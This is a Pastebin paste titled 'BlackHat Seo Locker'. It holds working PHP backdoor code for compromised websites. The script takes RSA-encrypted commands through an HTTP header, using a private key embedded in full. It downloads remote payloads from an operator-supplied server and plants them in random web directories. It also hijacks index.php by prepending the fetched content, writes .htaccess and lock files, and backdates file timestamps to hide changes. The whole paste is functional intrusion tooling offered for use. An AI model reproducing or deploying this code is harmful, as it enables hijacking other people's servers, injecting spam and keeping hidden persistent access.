willysec_id

BlackHat Seo Locker

Jul 15th, 2024
119
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 13.39 KB | Cybersecurity | 0 0
  1. <?php
  2. //style.php
  3. error_reporting(0);
  4. class ErrorCode
  5. {
  6.     const E_200400 = 200400;
  7. }
  8. class MsgText
  9. {
  10.     const PARAM_EMPTY = 'param is empty';
  11.     const PARAM_TYPE = 'param type error';
  12.     const VALUE_ERROR = 'value error';
  13.     const NOCHANGE = 'no change';
  14.     const LOCK_FILE_SUCCESS = 'generate lock file success,but lock index.php error';
  15.     const LOCK_FILE_ERROR = 'generate lock file error';
  16.     const REMOTE_GET_ERROR = 'get remote content error';
  17.     const LOCAL_FILE_ERROR = 'generate local file error';
  18.     const SUCCESS = 'success';
  19.     const LOCAL_FILE_EXISTS = 'local file doesn\'t exist';
  20.     const REMOTE_FILE_EXISTS = 'remote file doesn\'t exist';
  21.     const RENAME_ERROR = 'rename error';
  22.     const INDEX_ERROR = 'index hijack error';
  23.     const UNKNOWN_ERROR = 'unknown error';
  24.     const DECRYPT_FAIL = 'params decrypt fail';
  25. }
  26. function error($msg = MsgText::UNKNOWN_ERROR, $extras = [], $code = 0)
  27. {
  28.     empty($code) && $code = ErrorCode::E_200400;
  29.     exit(@json_encode(['code' => $code, 'msg' => $msg, 'extras' => $extras], JSON_UNESCAPED_UNICODE));
  30. }
  31. function success($data)
  32. {
  33.     exit(@json_encode(['code' => 200, 'msg' => MsgText::SUCCESS, 'data' => $data], JSON_UNESCAPED_UNICODE));
  34. }
  35. function getDirPathsByLevel($level = 6)
  36. {
  37.     $initDir = $_SERVER['DOCUMENT_ROOT'];
  38.     $dirs = array($initDir);
  39.     $count = count($dirs);
  40.     while (count($dirs) > ($count - 1)) {
  41.         $path = $dirs[($count - 1)];
  42.         $count += 1;
  43.         if (@is_dir($path) && @$handle = @opendir($path)) {
  44.             while ($file = @readdir($handle)) {
  45.                 $realpath = $path . '/' . $file;
  46.                 if ($file == '.' || $file == '..' || !is_dir($realpath) || substr($file, 0, 1) === '.') {
  47.                     continue;
  48.                 }
  49.                 $path3 = str_replace($initDir, "", $path);
  50.                 $path4 = explode("/", $path3);
  51.                 if (count($path4) > $level - 1) {
  52.                     continue;
  53.                 }
  54.                 $dirs[] = $realpath;
  55.             }
  56.         }
  57.         @closedir($handle);
  58.     }
  59.     return $dirs;
  60. }
  61. function getUrl($url)
  62. {
  63.     $curl = curl_init();
  64.     curl_setopt($curl, CURLOPT_URL, $url);
  65.     curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  66.     curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  67.     curl_setopt($curl, CURLOPT_TIMEOUT, 5);
  68.     curl_setopt($curl, CURLOPT_AUTOREFERER, 0);
  69.     curl_exec($curl);
  70.     $httpCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
  71.     curl_close($curl);
  72.     if ($httpCode === 200) {
  73.         $content = curl_exec($curl);
  74.         return ['code' => 200, 'resp' => $content];
  75.     }
  76.     return ['code' => 500, 'resp' => ''];
  77. }
  78. function getRemoteContent($url)
  79. {
  80.     $content = @file_get_contents($url);
  81.     if ($content === false) {
  82.         $curl = curl_init();
  83.         curl_setopt($curl, CURLOPT_URL, $url);
  84.         curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  85.         curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  86.         curl_setopt($curl, CURLOPT_TIMEOUT, 5);
  87.         curl_setopt($curl, CURLOPT_AUTOREFERER, 0);
  88.         $content = curl_exec($curl);
  89.         curl_close($curl);
  90.     }
  91.     return !empty($content) && is_string($content) ? $content : '';
  92. }
  93. function copyfile($content, $localfile, $isAppend = false, $appendContent = '')
  94. {
  95.     if ($isAppend && !empty($appendContent)) {
  96.         $content = trim($content);
  97.         if (substr($content, -2, 2) !== '?>') {
  98.             $content .= ' ?>';
  99.         }
  100.         $content = $content . PHP_EOL . PHP_EOL . $appendContent;
  101.     }
  102.     @file_put_contents($localfile, $content);
  103.     if (!file_exists($localfile)) {
  104.         $openedfile = @fopen($localfile, "w");
  105.         @fwrite($openedfile, $content);
  106.         @fclose($openedfile);
  107.     }
  108.     if (!file_exists($localfile)) {
  109.         return false;
  110.     }
  111.     return true;
  112. }
  113. function updateFiletime($filepath)
  114. {
  115.     $ctime = filectime($filepath);
  116.     $now = time();
  117.     if (!($now > $ctime + 31104000)) {
  118.         $newTime = $now - (mt_rand(15552000, 31104000));
  119.         touch($filepath, $newTime, $newTime);
  120.         return true;
  121.     }
  122.     return true;
  123. }
  124. $privateKey = '-----BEGIN PRIVATE KEY-----
  125. MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQC30w49ItOfldQ6
  126. dB+0gEbeeW6BEClcx+NZzmpX2YcRHFV80BurCWBavPFehV8Sy9yL2u/y3mv3QJJ+
  127. x2kKvly8zKx4GbXPbsWJk6Ho0Rxq49oXkBarQBOqROZeaFF3Mzpd/PdLSsxEvG1M
  128. tQd2wOx5r6XD86jyfN7LAJUUVvbJvn1CHo03nFH12k1KYwLnQfzQI5nX7yQLa0jt
  129. fG5TA34Fm0EMbFdHWjAN/VdEjoJI6it4PCQP5wk4ga2BvVquQkuPbsbr8364d3I6
  130. GuGAKDR0wfkT20n0E6kAmDI3ol2bfa0rQncqUS3OU3INpxOZS8eKCIgC3bM81mdi
  131. MQ6TsAQ9AgMBAAECggEAJLGSlA2RpLdpx8lKUuOQQfSHZGfveb/E2DZl7+dSGM5J
  132. GkMIYtnaTAKPQ8jns37SJXCsmRRhBNf05i20ABsDtAQ/ITIwopmAAPhhR3IGdCfL
  133. bwyqGcEOq9xZB9tW965YJk7KplLl94qNXtR8Cu5zxc6UDktjHBRk/Ky/FXJOjPKM
  134. sA8rhox7dqlZUB3I/qiqrQOgT1Bsq1BFT+2GGwRUWZ1CyFoZvhsDomdo4yhRrB0b
  135. 8Ym4MDiVqxFPVW8XB9RFD9YKt+v50Eb6iSKJNLpRmjZDNZbrEYO6NRsRBM7brDa9
  136. n39mZWFr47wGGXXv/NhwTvRI+2Si/ZfdP4+o5TeSWQKBgQDhIVOUODisiLhk7XKb
  137. Yu7BW1ZFcK0JxurqHN22msvA0Q/1q4RvziETjekXIn9lVKCmS/gy2O2RtuQRulAR
  138. fc3sz2W9tNXRF8Avy0728NG0baOOwBalO8w3cCX6Nnm70pJer+iJSn3tmAKSB4LT
  139. vbSB8pt6QgP8NPHyQdWp2LwOtwKBgQDRB8lgSaImIMJBaXERSaoNg8kxv3/cv4g5
  140. jUlljxNQcUsj0V7XilnB3mFxq5rHjBZTsKzMMQyvhOxYhptDfw6OLtoPUk2WiBUs
  141. l3qU0tIXNN+cTxu2SMKTjwMktkpmACJqa+k27eEUqxrKO/6SEiP9FMXHvgA4EEBM
  142. Hww1eU9QqwKBgAWSY5Uphw2OHLIyxkFeQ3Z5ojr5vO6fA7VjnYEld6GACxsTcaWq
  143. vlrTik9ORUTmwUscWjo38DlJA4AE0nJ8YJpZz7TQQvJ32gPUzlGCSE5k4EVqL6VL
  144. Q5Sjq+zzaDPj1EePpvuu4kr9FiMzGGPRMCR/MqXl+F9HmC1cv8MCYDUlAoGBAK77
  145. g7pVKaYdWkCD0iEUt4Rkw/IfSxwyQglbmwungBWhIbO0O17X9Fd0n8IWU5WkUbRx
  146. e9XbYbE05t0cobEZFcg0tFqLHWRcOs1/aSBYc4L1whMJrjskIa6A07LR3uoQRr8r
  147. 4qkW7YrtyZluK6eABByCXSbeiTRldk3C1+eTy6/NAoGAb9/J+NWrhYSr/VoGWjui
  148. chXCNszy4w6exVwxXQKNTtlzKxyhQfVPK2BxrptWL6KCRKpz3wh+WY2C3QYyVfwG
  149. FB4hwDr2mY4TWF9pD194iES1yhrQGlI8XM+2LVhBl3p0x+TFgJMaTgDDqAnxpuqT
  150. upBYqTYMlOd+VR7hENMaFqo=
  151. -----END PRIVATE KEY-----';
  152. $p = $_SERVER['HTTP_P'];
  153. $params = openssl_private_decrypt(base64_decode(urldecode($p)), $decrypted, $privateKey) ? $decrypted : null;
  154. if (is_null($params)) {
  155.     error(MsgText::DECRYPT_FAIL);
  156. }
  157. $params = json_decode($params, true);
  158. if (!is_array($params)) {
  159.     error(MsgText::PARAM_TYPE, $params);
  160. }
  161. if (empty($params['server'])) {
  162.     error('server ' . MsgText::PARAM_EMPTY);
  163. }
  164. if (empty($params['iden'])) {
  165.     error('iden ' . MsgText::PARAM_EMPTY);
  166. }
  167. $iden = isset($params['iden']) ? strtolower($params['iden']) : '';
  168. switch ($iden) {
  169.     case "beima":
  170.         $res = doBeima($params);
  171.         break;
  172.     case "rename":
  173.         $res = doRename($params);
  174.         break;
  175.     case "index":
  176.         $res = doIndex($params);
  177.         break;
  178.     case "sub":
  179.     case "htaccess":
  180.         $res = doSub($params);
  181.         break;
  182.     case "lock":
  183.         $res = doLock($params);
  184.         break;
  185.     case "style":
  186.         $res = doStyle($params);
  187.         break;
  188.     default:
  189.         error('iden ' . MsgText::VALUE_ERROR);
  190. }
  191. function doBeima($params)
  192. {
  193.     if (empty($params['filename'])) {
  194.         error('filename ' . MsgText::PARAM_EMPTY, $params);
  195.     }
  196.     if (empty($params['shellfile'])) {
  197.         error('shellfile ' . MsgText::PARAM_EMPTY, $params);
  198.     }
  199.     empty($params['level']) && $params['level'] = 6;
  200.     $dirs = getDirPathsByLevel($params['level']);
  201.     $temp = array_rand($dirs);
  202.     $createDir = $dirs[$temp] . '/';
  203.     $localfilepath = $createDir . $params['filename'];
  204.     $remoteFileUrl = $params['server'] . $params['shellfile'];
  205.     $content = getRemoteContent($remoteFileUrl);
  206.     $content = json_decode($content, true);
  207.     if (!empty($content['result'])) {
  208.         if (copyfile($content['result'], $localfilepath)) {
  209.             updateFiletime($localfilepath);
  210.             $beimaurl = str_replace($_SERVER['DOCUMENT_ROOT'], '', $localfilepath);
  211.             success(compact('localfilepath', 'beimaurl'));
  212.         }
  213.         error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
  214.     }
  215.     error(MsgText::REMOTE_FILE_EXISTS, compact('remoteFileUrl'));
  216. }
  217. function doRename($params)
  218. {
  219.     if (empty($params['sourcename'])) {
  220.         error('sourcename ' . MsgText::PARAM_EMPTY, $params);
  221.     }
  222.     if (empty($params['rename'])) {
  223.         error('rename ' . MsgText::PARAM_EMPTY, $params);
  224.     }
  225.     if ($params['sourcename'] === $params['rename']) {
  226.         error(MsgText::NOCHANGE);
  227.     }
  228.     $sourceFile = dirname(__FILE__) . DIRECTORY_SEPARATOR . $params['sourcename'];
  229.     $renameFile = dirname(__FILE__) . DIRECTORY_SEPARATOR . $params['rename'];
  230.     $resSource = $params['server'] . str_replace(strtolower($_SERVER['DOCUMENT_ROOT']), '', strtolower($sourceFile));
  231.     $resSource = str_replace('\\', '/', $resSource);
  232.     if (file_exists($sourceFile)) {
  233.         if (rename($sourceFile, $renameFile)) {
  234.             success($renameFile);
  235.         } else {
  236.             error(MsgText::RENAME_ERROR, compact('renameFile'));
  237.         }
  238.     } else {
  239.         error(MsgText::LOCAL_FILE_EXISTS, compact('resSource'));
  240.     }
  241. }
  242. function doIndex($params)
  243. {
  244.     if (empty($params['shellfile'])) {
  245.         error('shellfile ' . MsgText::PARAM_EMPTY, $params);
  246.     }
  247.     $remoteUrl = $params['server'] . trim($params['shellfile']);
  248.     $localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/index.php';
  249.     $content = getRemoteContent($remoteUrl);
  250.     $content = json_decode($content, true);
  251.     if (!empty($content['result'])) {
  252.         $oldContent = '';
  253.         if (file_exists($localfilepath)) {
  254.             $oldContent = @file_get_contents($localfilepath);
  255.         } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/index.html')) {
  256.             $oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/index.html');
  257.         } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/index.htm')) {
  258.             $oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/index.htm');
  259.         } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/default.html')) {
  260.             $oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/default.html');
  261.         } elseif (file_exists($_SERVER['DOCUMENT_ROOT'] . '/default.htm')) {
  262.             $oldContent = @file_get_contents($_SERVER['DOCUMENT_ROOT'] . '/default.htm');
  263.         }
  264.         if (copyfile($content['result'], $localfilepath, true, $oldContent)) {
  265.             updateFiletime($localfilepath);
  266.             @chmod($localfilepath, 0644);
  267.             success($localfilepath);
  268.         }
  269.         error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
  270.     }
  271.     error(MsgText::INDEX_ERROR, compact('remoteUrl'));
  272. }
  273. function doSub($params)
  274. {
  275.     if (empty($params['shellfile'])) {
  276.         error('shellfile' . MsgText::PARAM_EMPTY, $params);
  277.     }
  278.     if (empty($params['filename'])) {
  279.         error('filename ' . MsgText::PARAM_EMPTY, $params);
  280.     }
  281.     $localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/' . $params['filename'];
  282.     $remoteFileUrl = $params['server'] . $params['shellfile'];
  283.     $content = getRemoteContent($remoteFileUrl);
  284.     $content = json_decode($content, true);
  285.     if (!empty($content['result'])) {
  286.         if (copyfile($content['result'], $localfilepath)) {
  287.             updateFiletime($localfilepath);
  288.             @chmod($localfilepath, 0644);
  289.             success($localfilepath);
  290.         }
  291.         error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
  292.     }
  293.     error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
  294. }
  295. function doLock($params)
  296. {
  297.     if (empty($params['filename'])) {
  298.         error('filename ' . MsgText::PARAM_EMPTY, $params);
  299.     }
  300.     if (empty($params['domain'])) {
  301.         error('domain ' . MsgText::PARAM_EMPTY, $params);
  302.     }
  303.     if (empty($params['shellfile'])) {
  304.         error('shellfile ' . MsgText::PARAM_EMPTY, $params);
  305.     }
  306.     $localfilepath = $_SERVER['DOCUMENT_ROOT'] . '/' . $params['filename'];
  307.     $remoteFileUrl = $params['server'] . $params['shellfile'];
  308.     $content = getRemoteContent($remoteFileUrl);
  309.     $content = json_decode($content, true);
  310.     if (!empty($content['result'])) {
  311.         if (copyfile($content['result'], $localfilepath)) {
  312.             $lockurl = $params['domain'] . $params['filename'];
  313.             $lockres = getUrl($lockurl);
  314.             @unlink($localfilepath);
  315.             if ($lockres['code'] === 200 && !empty($lockres['resp']) && strpos($lockres['resp'], 'success')) {
  316.                 success($lockres['resp']);
  317.             }
  318.             error(MsgText::LOCK_FILE_SUCCESS, compact('lockurl', 'lockres'));
  319.         }
  320.         @unlink($localfilepath);
  321.         error(MsgText::LOCK_FILE_ERROR, compact('localfilepath'));
  322.     }
  323.     error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
  324. }
  325. function doStyle($params)
  326. {
  327.     if (empty($params['shellfile'])) {
  328.         error('shellfile' . MsgText::PARAM_EMPTY, $params);
  329.     }
  330.     if (empty($params['filename'])) {
  331.         error('filename ' . MsgText::PARAM_EMPTY, $params);
  332.     }
  333.     if (empty($params['domain'])) {
  334.         error('domain ' . MsgText::PARAM_EMPTY, $params);
  335.     }
  336.     $localfilepath = $params['domain'] . $params['filename'];
  337.     $remoteFileUrl = $params['server'] . $params['shellfile'];
  338.     $content = getRemoteContent($remoteFileUrl);
  339.     $content = json_decode($content, true);
  340.     if (!empty($content['result'])) {
  341.         if (copyfile($content['result'], $localfilepath)) {
  342.             updateFiletime($localfilepath);
  343.             @chmod($localfilepath, 0644);
  344.             success($localfilepath);
  345.         }
  346.         error(MsgText::LOCAL_FILE_ERROR, compact('localfilepath'));
  347.     }
  348.     error(MsgText::REMOTE_GET_ERROR, compact('remoteFileUrl'));
  349. }
Add Comment
Please, Sign In to add comment